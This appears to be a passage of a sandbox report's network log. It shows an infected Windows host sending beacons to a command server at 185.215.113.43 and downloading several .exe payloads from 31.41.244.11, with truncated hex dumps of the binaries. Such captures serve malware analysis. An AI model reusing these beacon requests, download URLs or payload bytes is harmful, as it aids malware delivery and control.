Jan 7, 2025 10:09:17.774624109 CET	1236	IN	Data Raw: 7e 02 00 b8 c4 60 46 00 c7 45 f0 68 60 46 00 89 45 ec 83 65 fc 00 c7 05 c4 60 46 00 4c 16 45 00 c7 45 fc 01 00 00 00 68 3c 3a 46 00 50 68 74 60 46 00 e8 15 58 02 00 83 4d fc ff 68 06 01 45 00 e8 87 7b 02 00 83 c4 10 e8 1f 7e 02 00 c3 6a 08 b8 df Data Ascii: ~`FEh`FEe`FLEEh<:FPht`FXMhE{~jD5~\`FE`FEe\`F0EEh:FPh`FWMhE0{}h0FF^$E{YjhFjhEz,Fs_h.EzYh$E
Jan 7, 2025 10:09:17.774632931 CET	224	IN	Data Raw: cc cc cc cc cc cc cc 68 68 ce 45 00 e8 42 5d 02 00 cc cc cc cc cc cc 55 8b ec 83 ec 0c a1 24 61 46 00 33 c5 89 45 fc 8b 55 08 8d 45 f4 56 8b f1 89 55 f4 8d 4e 04 c6 45 f8 01 51 0f 57 c0 c7 06 24 16 45 00 50 66 0f d6 01 e8 8a 84 02 00 8b 4d fc 83 Data Ascii: hhEB]U$aF3EUEVUNEQW$EPfM0E3^3p]UVWFP$EfEP>0E^]UEu]PaUEU
Jan 7, 2025 10:09:17.774736881 CET	1236	IN	Data Raw: 89 10 89 48 04 5d c2 08 00 cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 8b 01 8d 55 f8 83 ec 08 56 ff 75 08 52 ff 50 0c 8b 75 0c 8b 48 04 8b 56 04 8b 49 04 3b 4a 04 75 0f 8b 00 3b 06 75 09 b0 01 5e 8b e5 5d c2 08 00 32 c0 5e 8b e5 5d c2 08 Data Ascii: H]UUVuRPuHVI;Ju;u^]2^]UAVuV;Bu;Eu^]2^]AkFSUkl$jhDdPSX$aF3EVWPEd}CMP}NCsE
Jan 7, 2025 10:09:17.779247046 CET	1236	IN	Data Raw: 00 50 66 0f d6 01 e8 19 7f 02 00 8b 4d fc 83 c4 08 c7 06 90 e1 45 00 8b c6 33 cd 5e e8 c2 6a 02 00 8b e5 5d c2 04 00 cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 6a ff 68 4d 85 44 00 64 a1 00 00 00 00 50 83 ec 08 a1 24 61 46 00 33 c5 89 45 f0 56 Data Ascii: PfME3^j]UjhMDdP$aF3EVPEduuEvFVEPjVpMdY^M3Dj]UVj'nMEWVuFF,@vNFyPu^]

Session ID	Source IP	Source Port	Destination IP	Destination Port
13	192.168.2.4	50029	185.215.113.43	80

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 10:09:20.570852041 CET	184	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 33 32 36 34 35 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1032645001&unit=246122658369
Jan 7, 2025 10:09:21.299844027 CET	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Jan 2025 09:09:21 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0

Session ID	Source IP	Source Port	Destination IP	Destination Port
14	192.168.2.4	50031	31.41.244.11	80

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 10:09:21.312046051 CET	66	OUT	GET /files/6069966613/VDoTjfk.exe HTTP/1.1 Host: 31.41.244.11
Jan 7, 2025 10:09:22.005522966 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Jan 2025 09:09:21 GMT Content-Type: application/octet-stream Content-Length: 360448 Last-Modified: Tue, 07 Jan 2025 02:11:30 GMT Connection: keep-alive ETag: "677c8d52-58000" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 db 35 e6 fd 00 00 00 00 00 00 00 00 e0 00 2e 01 0b 01 30 00 00 86 00 00 00 06 00 00 00 00 00 00 ae a4 00 00 00 20 00 00 00 c0 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 00 06 00 00 04 00 00 f1 40 06 00 03 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 60 a4 00 00 4b 00 00 00 00 c0 00 00 42 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 0c 00 00 00 16 a4 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL5.0 @ @``KB H.text `.rsrcB@@.reloc@B.bss@
Jan 7, 2025 10:09:22.005544901 CET	224	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 a4 00 00 00 00 00 00 48 00 00 00 02 00 05 00 88 3f 00 00 44 3f 00 00 03 00 02 Data Ascii: H?D?~0V~:K( s((( ?r
Jan 7, 2025 10:09:22.005599022 CET	1236	IN	Data Raw: 00 70 73 14 00 00 0a 7a 2a 00 00 2e 28 26 00 00 06 28 01 00 00 06 2a 1b 30 06 00 01 01 00 00 02 00 00 11 03 3a 0b 00 00 00 72 ea 00 00 70 73 14 00 00 0a 7a 20 00 01 00 00 8d 1d 00 00 01 0a 20 00 01 00 00 8d 1d 00 00 01 0b 16 0c 38 15 00 00 00 06 Data Ascii: psz.(&(0:rpsz 8(]X ?8$XX ]X ?8fXrp(]X ]o(
Jan 7, 2025 10:09:22.005611897 CET	1236	IN	Data Raw: 1a 00 00 04 16 80 1b 00 00 04 73 32 00 00 0a 80 1c 00 00 04 16 80 1d 00 00 04 16 6a 80 1e 00 00 04 14 80 1f 00 00 04 14 80 20 00 00 04 16 6a 80 21 00 00 04 16 80 22 00 00 04 16 80 23 00 00 04 16 80 24 00 00 04 16 80 25 00 00 04 7e 31 00 00 0a 80 Data Ascii: s2j j!"#$%~1&'s3()+,-.~1/(4&EP*0W iZ ]Y X ]:
Jan 7, 2025 10:09:22.005693913 CET	1236	IN	Data Raw: 06 12 04 11 05 11 06 09 1f 0a 1f 17 1f 28 06 28 16 00 00 06 12 03 11 04 11 05 11 06 1f 0d 1a 1f 29 06 28 16 00 00 06 12 06 09 11 04 11 05 16 1f 0b 1f 2a 06 28 16 00 00 06 12 05 11 06 09 11 04 19 1f 10 1f 2b 06 28 16 00 00 06 12 04 11 05 11 06 09 Data Ascii: (()(*(+(,(-(.(/(0(1(2(3(4(
Jan 7, 2025 10:09:22.005700111 CET	672	IN	Data Raw: 58 11 10 20 00 00 00 ff 5f 1f 18 64 d2 9c 11 08 17 58 13 08 11 08 07 3f 81 fe ff ff 08 80 14 00 00 04 2a 1b 30 03 00 6a 00 00 00 07 00 00 11 14 0a 28 19 00 00 06 39 0b 00 00 00 73 37 00 00 0a 0a 38 51 00 00 00 00 73 38 00 00 0a 0a dd 45 00 00 00 Data Ascii: X _dX?0j(9s78Qs8E&rLprp(9o:t= &rWprp(9o:t=$C #E0.s;&&(<&*
Jan 7, 2025 10:09:22.006553888 CET	1236	IN	Data Raw: 38 4d 01 00 00 11 0e 1a 5a 13 0f 20 ff 00 00 00 13 10 16 13 11 11 0e 11 07 17 59 40 46 00 00 00 11 06 16 3e 3e 00 00 00 16 13 0a 16 13 12 38 25 00 00 00 11 12 16 3e 06 00 00 00 11 0a 1e 62 13 0a 11 0a 11 05 11 05 8e 69 17 11 12 58 59 91 60 13 0a Data Ascii: 8MZ Y@F>>8%>biXY`X?8+XbXb`Xb``(%XY@S>Ka8.>bXX__dX
Jan 7, 2025 10:09:22.006566048 CET	1236	IN	Data Raw: 0a 0d 09 39 3b 00 00 00 09 8e 39 34 00 00 00 08 17 09 16 91 9c 08 19 09 17 91 9c 08 1b 09 18 91 9c 08 1d 09 19 91 9c 08 1f 09 09 1a 91 9c 08 1f 0b 09 1b 91 9c 08 1f 0d 09 1c 91 9c 08 1f 0f 09 1d 91 9c 16 13 04 38 14 00 00 00 07 11 04 07 11 04 91 Data Ascii: 9;948aXi?@U(%ooop(7sq%ior%os(8otot~~ou(v9Ps(*0
Jan 7, 2025 10:09:22.006577969 CET	448	IN	Data Raw: 00 06 72 fc 04 00 70 28 77 00 00 0a 72 0a 05 00 70 28 26 00 00 0a 28 2e 00 00 06 d0 18 00 00 02 28 2e 00 00 0a 28 84 00 00 0a 74 18 00 00 02 80 2e 00 00 04 7e 2e 00 00 04 02 6f 6f 00 00 06 2a 00 00 00 e2 7e 2f 00 00 04 7e 31 00 00 0a 28 86 00 00 Data Ascii: rp(wrp(&(.(.(t.~.oo~/~1(9rp(wr(p(&(-/~/0PsoGi8o>XY=9o7As
Jan 7, 2025 10:09:22.006588936 CET	1236	IN	Data Raw: 00 0a 16 26 26 18 8d 1d 00 00 01 25 16 17 9c 25 17 18 9c 2a 00 00 00 72 72 d2 05 00 70 6f 6a 00 00 0a 16 26 26 18 8d 1d 00 00 01 25 16 17 9c 25 17 18 9c 2a 00 00 00 72 72 06 06 00 70 6f 6a 00 00 0a 16 26 26 18 8d 1d 00 00 01 25 16 17 9c 25 17 18 Data Ascii: &&%%rrpoj&&%%rrpoj&&%%rr:poj&&%%rrnpoj&&%%rrpoj&&%%rrpoj&&%%*rrpoj&&%%
Jan 7, 2025 10:09:22.011576891 CET	1236	IN	Data Raw: 0e b8 07 06 00 70 0e b8 07 06 00 ae 0e dd 00 06 00 bc 0e ca 0e 06 00 e1 0e ca 0e 06 00 ed 0e f5 0e 06 00 41 0f b8 07 06 00 57 0f dd 00 06 00 1b 10 ca 0e 06 00 22 10 ca 0e 06 00 9a 10 a4 00 06 00 bc 10 c8 0a 06 00 dd 10 dd 00 06 00 05 11 c8 0a 06 Data Ascii: pAW" -]c)~]7@SQmQUU

Session ID	Source IP	Source Port	Destination IP	Destination Port
15	192.168.2.4	50037	185.215.113.43	80

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 10:09:24.970156908 CET	184	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 33 32 36 37 32 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1032672001&unit=246122658369
Jan 7, 2025 10:09:25.693320036 CET	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Jan 2025 09:09:25 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0

Session ID	Source IP	Source Port	Destination IP	Destination Port
16	192.168.2.4	50040	31.41.244.11	80

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 10:09:25.793859005 CET	66	OUT	GET /files/6332377394/D95Ju8g.exe HTTP/1.1 Host: 31.41.244.11
Jan 7, 2025 10:09:26.463124037 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Jan 2025 09:09:26 GMT Content-Type: application/octet-stream Content-Length: 1453568 Last-Modified: Tue, 07 Jan 2025 01:21:30 GMT Connection: keep-alive ETag: "677c819a-162e00" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 44 cb 66 67 00 00 00 00 00 00 00 00 e0 00 0e 01 0b 01 08 00 00 24 16 00 00 08 00 00 00 00 00 00 fe 42 16 00 00 20 00 00 00 60 16 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 a0 16 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 b0 42 16 00 4b 00 00 00 00 60 16 00 88 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 16 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELDfg$B `@ `BK` H.text# $ `.rsrc`&@@.reloc,@BBH01Z(((0 8EqH8~rp(os ~{:& 8~9 ~{9& 8z8 ~{9a& 8V~j(r?p~ot&~~0d 8ED8?(rOp((+o&
Jan 7, 2025 10:09:26.463160992 CET	1236	IN	Data Raw: 00 00 7e 01 02 00 04 7b 95 01 00 04 39 ba ff ff ff 26 20 00 00 00 00 38 af ff ff ff 2a 26 7e 04 00 00 04 14 fe 01 2a 00 00 1a 7e 04 00 00 04 2a 00 13 30 04 00 84 00 00 00 01 00 00 11 20 01 00 00 00 fe 0e 00 00 38 00 00 00 00 fe 0c 00 00 45 02 00 Data Ascii: ~{9& 8&~~0 8E8((o~%98&~s%(+( ~{9& 8&~~.s(Forc
Jan 7, 2025 10:09:26.463172913 CET	1236	IN	Data Raw: a4 03 00 00 01 20 0a 00 00 00 7e 01 02 00 04 7b eb 01 00 04 39 06 ff ff ff 26 20 0d 00 00 00 38 fb fe ff ff 11 01 19 72 2d 01 00 70 a4 03 00 00 01 20 02 00 00 00 7e 01 02 00 04 7b 0d 02 00 04 39 da fe ff ff 26 20 11 00 00 00 38 cf fe ff ff 11 00 Data Ascii: ~{9& 8r-p ~{9& 8: 8* 8or1poo ~{:t& 8ir7p 8R*~" 8:ora
Jan 7, 2025 10:09:26.463182926 CET	1236	IN	Data Raw: 7d 0f 00 00 04 20 01 00 00 00 7e 01 02 00 04 7b 8f 01 00 04 39 d2 ff ff ff 26 20 01 00 00 00 38 c7 ff ff ff 00 13 30 03 00 4b 00 00 00 01 00 00 11 20 01 00 00 00 fe 0e 00 00 38 00 00 00 00 fe 0c 00 00 45 02 00 00 00 2b 00 00 00 05 00 00 00 38 26 Data Ascii: } ~{9& 80K 8E+8&( ~{9& 8{&~~0 8E7i8%/sko ~{9
Jan 7, 2025 10:09:26.463193893 CET	896	IN	Data Raw: 08 00 00 00 38 00 00 00 00 11 00 2a 02 7b 16 00 00 04 8c 0e 00 00 02 6f 25 00 00 0a 13 00 20 00 00 00 00 7e 01 02 00 04 7b a9 01 00 04 39 c5 ff ff ff 26 20 00 00 00 00 38 ba ff ff ff 26 7e 17 00 00 04 14 fe 01 2a 00 00 1a 7e 17 00 00 04 2a 00 1e Data Ascii: 8{o% ~{9& 8&~~{0K 8E+8&} ~{9& 8{0K 8E8*}
Jan 7, 2025 10:09:26.463269949 CET	1236	IN	Data Raw: 00 02 17 7d 1b 00 00 04 38 00 00 00 00 02 17 7d 1d 00 00 04 38 00 00 00 00 02 28 01 00 00 0a 20 00 00 00 00 7e 01 02 00 04 7b 07 02 00 04 39 14 00 00 00 26 20 00 00 00 00 38 09 00 00 00 38 9a ff ff ff fe 0c 00 00 45 01 00 00 00 05 00 00 00 38 00 Data Ascii: }8}8( ~{9& 88E8&~ ~ {!0Z 8E:85rp(&('}! ~{9& 8*0 8
Jan 7, 2025 10:09:26.463282108 CET	224	IN	Data Raw: 04 7b 0c 02 00 04 3a 8c ff ff ff 26 20 00 00 00 00 38 81 ff ff ff 11 01 28 2d 00 00 0a 20 03 00 00 00 38 70 ff ff ff 2a 00 1e 02 28 30 00 00 06 2a 26 7e 23 00 00 04 14 fe 01 2a 00 00 1a 7e 23 00 00 04 2a 00 1e 02 28 01 00 00 0a 2a 13 30 05 00 b6 Data Ascii: {:& 8(- 8p(0&~#~#(*0 8E+`F08&:U ~{:& 88 8 o. 8
Jan 7, 2025 10:09:26.463318110 CET	1236	IN	Data Raw: 87 ff ff ff 2a 03 11 00 16 11 01 6f 2f 00 00 0a 20 00 00 00 00 7e 01 02 00 04 7b d3 01 00 04 39 67 ff ff ff 26 20 00 00 00 00 38 5c ff ff ff 00 00 13 30 04 00 e7 00 00 00 0a 00 00 11 20 05 00 00 00 fe 0e 02 00 38 00 00 00 00 fe 0c 02 00 45 06 00 Data Ascii: o/ ~{9g& 8\0 8E=@f8s0 8o1 ~{9& 8o2 ~{:& 8}jo3& ~{:^&
Jan 7, 2025 10:09:26.463334084 CET	1236	IN	Data Raw: 06 00 00 00 38 00 00 00 00 2a 02 03 7d 2b 00 00 04 20 00 00 00 00 7e 01 02 00 04 7b b6 01 00 04 39 d2 ff ff ff 26 20 00 00 00 00 38 c7 ff ff ff 00 1e 02 7b 2c 00 00 04 2a 1e 02 7b 2d 00 00 04 2a 13 30 03 00 4b 00 00 00 01 00 00 11 20 01 00 00 00 Data Ascii: 8}+ ~{9& 8{,{-0K 8E8}- ~{9& 8{.*0K 8E+8&}. ~{9& 8
Jan 7, 2025 10:09:26.463346958 CET	1236	IN	Data Raw: 00 00 00 20 03 00 00 00 7e 01 02 00 04 7b a6 01 00 04 39 ac ff ff ff 26 20 08 00 00 00 38 a1 ff ff ff 00 02 7b 3d 00 00 04 3a 61 00 00 00 20 00 00 00 00 7e 01 02 00 04 7b cc 01 00 04 3a 0f 00 00 00 26 20 00 00 00 00 38 04 00 00 00 fe 0c 04 00 45 Data Ascii: ~{9& 8{=:a ~{:& 8E18s=}= ~{9& 8(> ~{:& 8E8 ~{:& 8{=o
Jan 7, 2025 10:09:26.469249964 CET	1236	IN	Data Raw: 1f 00 00 00 11 03 00 00 38 3d 01 00 00 02 7b 38 00 00 04 02 6f 42 00 00 0a 20 03 00 00 00 fe 0e 02 00 38 c0 ff ff ff 00 02 7b 3d 00 00 04 3a 4c 00 00 00 20 02 00 00 00 fe 0e 05 00 38 00 00 00 00 fe 0c 05 00 45 03 00 00 00 29 00 00 00 54 00 00 00 Data Ascii: 8={8oB 8{=:L 8E)T8$8J ~{:& 8{=o?& ~{:& 8j 8EV/8Q{>:F ~{:

Session ID	Source IP	Source Port	Destination IP	Destination Port
17	192.168.2.4	50048	185.215.113.43	80

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 10:09:30.172305107 CET	184	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 33 32 38 38 34 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1032884001&unit=246122658369
Jan 7, 2025 10:09:30.842933893 CET	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Jan 2025 09:09:30 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0

Session ID	Source IP	Source Port	Destination IP	Destination Port
18	192.168.2.4	50050	31.41.244.11	80

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 10:09:30.937782049 CET	66	OUT	GET /files/7809335824/ZNWzk16.exe HTTP/1.1 Host: 31.41.244.11
Jan 7, 2025 10:09:31.620131016 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Jan 2025 09:09:31 GMT Content-Type: application/octet-stream Content-Length: 198656 Last-Modified: Mon, 06 Jan 2025 19:07:23 GMT Connection: keep-alive ETag: "677c29eb-30800" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 1b 25 7c 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 fc 02 00 00 0a 00 00 00 00 00 00 3e 1a 03 00 00 20 00 00 00 20 03 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 60 03 00 00 02 00 00 00 00 00 00 03 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 ec 19 03 00 4f 00 00 00 00 20 03 00 26 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 03 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL%\|g0> @ `@O &@ H.textD `.rsrc& @@.reloc@@B HO\gZ$th`LKADBEMBSGQSFFE@ROB?FKFpeaGEPOhYYY_Z$Y_ZY_Z%Y_ZYYYYY\Z/Y\Z Y\Z%YYY^\ZY^\ZYbKQLYdoh8MBdt$
Jan 7, 2025 10:09:31.620186090 CET	1236	IN	Data Raw: 2b b3 b4 5c b4 b4 b4 cc 2b b3 b4 64 b4 b4 b4 b4 b4 b4 b4 b4 b4 b4 b4 b4 b4 b4 b4 b4 b4 b4 b4 b4 b4 b4 b4 b4 b4 b4 b4 b4 84 b2 b4 2c a4 b4 b4 78 36 b3 b4 98 b4 b4 b4 b4 b4 b4 b4 b4 b4 b4 b4 b4 b4 b4 b4 b4 b4 b4 b4 b4 b4 b4 b4 b4 b4 b4 b4 5c 36 b3 Data Ascii: +\+d,x6\6t\@O<@TBPS@SSRttPS@S+40
Jan 7, 2025 10:09:31.620203972 CET	1236	IN	Data Raw: 30 a0 ae b4 b4 cb b4 b4 b4 b4 29 2f 60 b5 b5 b5 87 bc 47 fb 1f a5 30 5d aa b4 b4 cb b4 b4 b4 b4 29 2f 60 b5 b5 b5 87 41 d3 74 1e a5 30 32 a6 b4 b4 cb b4 b4 b4 b4 29 2f 60 b5 b5 b5 87 2c 13 ea 1d a5 30 63 ab b4 b4 cb b4 b4 b4 b4 29 2f 60 b5 b5 b5 Data Ascii: 0)/`G0])/`At02)/`,0c)/`&g0)/`:0%)/`{8*0)/`cI0r)/`lq-0P)/``0 )/`0a)/`e0
Jan 7, 2025 10:09:31.620214939 CET	1236	IN	Data Raw: b5 2c dc 80 b5 2c c0 34 c0 b5 03 b3 34 c3 b4 2c f2 34 d2 b4 94 e9 2c cf 34 cf b4 94 e6 ac da ac bf 84 ca ac d4 80 b5 34 eb b4 94 ec ac f2 fc 8b fd 2d 6c fb 2a 64 c1 58 be f2 b3 a5 6f f3 2b 2f 58 b5 b5 b5 cb 76 a7 b4 b4 64 2b d4 2b 2f 50 b5 b5 b5 Data Ascii: ,,44,4,44-l*dXo+/Xvd++/Pd++/L1++/Hd++/Dd++/@3++/<)+3<13<11 1,-lVo+/X/XCJ)'\d++/8
Jan 7, 2025 10:09:31.620224953 CET	896	IN	Data Raw: a5 6f f3 2b 2f 58 b5 b5 b5 cb 0f ac b4 b4 29 2f 38 b5 b5 b5 29 b4 2b 6f 00 ed 2f 58 b5 b5 b5 12 4c c5 4f cb 29 ac b4 b4 29 6f 00 31 c8 b0 2b b0 90 b5 9f 84 84 b3 a4 ed 2f 58 b5 b5 b5 0b d4 8a 46 cb 47 ac b4 b4 ed 2f 58 b5 b5 b5 2a 0c e0 b7 cb 56 Data Ascii: o+/X)/8)+o/XLO))o1+/XFG/XV)o4)1+pppp+)o0+)/@))o,+)/@))g,))kx+o/XG)g)o(+)o$N/X{8)
Jan 7, 2025 10:09:31.620346069 CET	1236	IN	Data Raw: f3 2b 2f 58 b5 b5 b5 cb 8d af b4 b4 29 6f 28 29 b4 83 eb 8b f3 83 f4 31 cc 9c b3 f3 83 f4 8b ec 29 67 28 29 ab a5 fd 6b a0 87 8a e0 9e c8 b3 ec af 8a e0 9e c8 29 67 24 a5 fd ab 49 eb 8c 87 7d 3d 64 8b b3 ec af 7d 3d 64 8b 2b 6f e8 ed 2f 58 b5 b5 Data Ascii: +/X)o()1)g()k)g$I}=d}=d+o/X#)g)o +)o )+o/XSxk)+3H13H11 1,,44,4,44lq-o+/Xr)g
Jan 7, 2025 10:09:31.620357037 CET	1236	IN	Data Raw: fa cb 5b b4 b4 b4 29 6f f0 29 6f f8 ed 2f 58 b5 b5 b5 79 0b 0f d3 cb 70 b4 b4 b4 29 67 e4 31 c8 ac 2b d4 2b ac ed 74 b0 14 83 b3 a4 cc 3e 3a b4 b4 31 f0 ac ed 2f 58 b5 b5 b5 6c 71 2d 08 cb 98 b4 b4 b4 29 6f c8 31 c8 b0 2b b0 90 b5 9f 84 84 b3 a4 Data Ascii: [)o)o/Xyp)g1++t>:1/Xlq-)o1+)o4/X8R_+a^1<)o+o,)o+o(+o)1+11 4,g1,oo$@])o$+o0 ,0)o0^X%0z)o0d!0G
Jan 7, 2025 10:09:31.620367050 CET	1236	IN	Data Raw: b4 b1 6c 78 29 6f 0c 2b ac 29 6f 14 29 ac 29 6f 0c 29 b4 b1 6c 3c 29 6f 08 2b ac 29 6f 14 29 ac 29 6f 08 29 b4 b1 6c 98 29 6f 04 2b ac 29 6f 14 29 ac 29 6f 08 29 b4 b1 6c 90 29 6f 00 2b ac ed 6f 24 46 e7 22 e2 cb e8 ae b4 b4 13 ac 8b b2 a4 29 a7 Data Ascii: lx)o+)o))o)l<)o+)o))o)l)o+)o))o)l)o+o$F")+3+13+11 1,d! ,o+o$6)o))o)l)o+)o)1+11 1,d!o+
Jan 7, 2025 10:09:31.620376110 CET	672	IN	Data Raw: d8 8e 9b 31 f4 b3 af 52 d8 8e 9b 2b 6f c8 29 a7 ac 8b b2 a4 13 b0 8b b2 a4 2b ea 33 f2 9f f9 4f d2 31 ca b3 33 ca 9f f9 4f d2 a5 05 ea 31 d3 b3 31 bb b4 a5 20 f1 31 bc aa a5 18 ee 2c dc 80 b5 2c c0 34 c0 b5 03 b3 34 c3 b3 2c f2 34 d2 b5 94 e9 2c Data Ascii: 1R+o)+3O13O11 1,,44,4,44c=o+o$o$w[)o)g+o$o$WT)1+11 1,,44,4,4
Jan 7, 2025 10:09:31.620385885 CET	1236	IN	Data Raw: 29 6f ec 2b 6f f4 87 0c 0e 55 25 a5 30 94 b1 b4 b4 cb b4 b4 b4 b4 29 6f f4 87 4a 54 62 20 a5 30 a9 b0 b4 b4 cb b4 b4 b4 b4 29 6f f4 87 81 8f bb 15 a5 30 4e b2 b4 b4 cb b4 b4 b4 b4 29 6f f4 87 14 87 8a 0a a5 30 ef b1 b4 b4 cb b4 b4 b4 b4 29 6f f4 Data Ascii: )o+oU%0)oJTb 0)o0N)o0)o%k0?)oB;0)o0)oK}0)ofl0B)oy0)oLs0s)op0L)ova0
Jan 7, 2025 10:09:31.625036955 CET	1236	IN	Data Raw: ec 17 79 aa 9c cb 92 b9 b5 b5 24 5f 2b cf 5e 31 c8 98 29 6f a8 2b 6f d0 29 6f ac 2b 6f cc ed 6f c8 b9 3f fc 4e 29 6f c8 2b 6f d4 87 1d 33 9a 16 a5 30 5c b4 b4 b4 cb b4 b4 b4 b4 29 6f d4 87 b9 3f fc 4e a5 30 aa b4 b4 b4 cb b4 b4 b4 b4 cb 22 b4 b4 Data Ascii: y$_+^1)o+o)o+oo?N)o+o30\)o?N0")g)_d++_+))_A1A+o)o+oo3])?3G13G+1333)g1+'OVWy$_+a]^3

Session ID	Source IP	Source Port	Destination IP	Destination Port
19	192.168.2.4	50055	185.215.113.43	80

Timestamp	Bytes transferred	Direction	Data
